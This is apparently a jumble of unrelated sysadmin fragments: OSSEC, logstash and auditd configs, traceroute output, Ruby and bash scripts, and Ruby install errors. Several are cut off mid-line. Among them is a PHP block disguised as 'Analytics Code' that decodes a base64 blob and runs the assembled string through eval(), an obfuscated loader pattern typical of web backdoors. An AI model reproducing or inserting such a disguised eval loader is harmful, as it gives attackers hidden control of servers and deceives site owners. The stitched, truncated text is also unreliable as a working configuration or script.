<command>
  <name>firewall-drop</name>
  <executable>firewall-drop.sh</executable>
  <expect>srcip</expect>
</command>
<active-response>
  <command>firewall-drop</command>
  <location>all</location>
  <rules_id>1002</rules_id>
#!/usr/bin/env ruby
# Version Controlled Notes.... Because I'm lazy. - Maus.
# TODO: Get git syncing working. Maybe do a branch that merges to master?
require 'optparse'
require 'fileutils'
require 'digest'
config = {
  notes_path: ENV['HOME'] + '/notes',
  git_path: ENV['HOME'] + '/notes/.git',
  git_remote: '',
input {
  syslog {
    type => syslog
    port => 514
  }
}
filter {
  grok {
    type => "auditd"
    pattern => [" AUDIT type=%{WORD:audit_type} msg=audit\(%{NUMBER:audit_epoch}:%{NUMBER:audit_coun
traceroute: Warning: cdn-registry-1.docker.io has multiple addresses; using 162.159.253.251
traceroute to cdn-registry-1.docker.io.cdn.cloudflare.net (162.159.253.251), 64 hops max, 52 byte packets
1 10.236.2.1 (10.236.2.1) 4.231 ms 3.890 ms 3.957 ms
2 192.168.128.210 (192.168.128.210) 3.095 ms 4.799 ms 4.169 ms
3 206.169.168.41 (206.169.168.41) 44.070 ms 9.694 ms 4.097 ms
4 sjc1-pr1-xe-0-2-0-0.us.twtelecom.net (66.192.251.170) 17.472 ms 10.101 ms 16.170 ms
5 equinix.xe-2-0-0.cr1.sjc1.us.nlayer.net (206.223.116.61) 8.831 ms 7.277 ms 6.697 ms
6 as13335.xe-8-1-0.cr1.sjc1.us.nlayer.net (69.22.153.214) 38.691 ms 66.615 ms 23.516 ms
7 162.159.253.251 (162.159.253.251) 7.672 ms 7.594 ms 6.401 ms
## Remove any existing rules
-D
## Buffer Size
## Feel free to increase this if the machine panics
-b 8192
## Failure Mode
## Possible values are 0 (silent), 1 (printk, print a failure message),
## and 2 (panic, halt the system).
<?php
//Begin Analytics Code
$STAT = unserialize(base64_decode("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"));
$values =
    $STAT[8] . $STAT[7] . $STAT[8] . $STAT[27] . $STAT[17] . $STAT[1] . $STAT[31] . $STAT[29] .
    $STAT[30] . strtoupper( $STAT[26] . $STAT[17] . $STAT[27] ) . $STAT[24] . $STAT[20] .
    $STAT[28] . $STAT[1] . $STAT[19] . $STAT[20] . $STAT[23] .$STAT[25];
eval("$values");
?>
#!/bin/bash
# 2012 Maus Stearns,
# Quick ssh tunneling / reconnect tool
# Used primarily for quick synergy tunnels.
RHOST=192.168.1.1
RPORT=24800
PID=$(ps -ef |grep ssh |grep $RPORT | awk '{print $2}')
if [ -n "$PID" ]; then
  echo "Existing Connection Exists. $PID"
/usr/local/rvm/rubies/ruby-1.9.3-p392/lib/ruby/1.9.1/yaml.rb:56:in `<top (required)>':
It seems your ruby installation is missing psych (for YAML output).
To eliminate this warning, please install libyaml and reinstall your ruby.
ERROR: Loading command: install (LoadError)
cannot load such file -- zlib
ERROR: While executing gem ... (NameError)
uninitialized constant Gem::Commands::InstallCommand
/usr/local/rvm/rubies/ruby-1.9.3-p392/lib/ruby/1.9.1/yaml.rb:56:in `<top (required)>':
It seems your ruby installation is missing psych (for YAML output).
To eliminate this warning, please install libyaml and reinstall your ruby.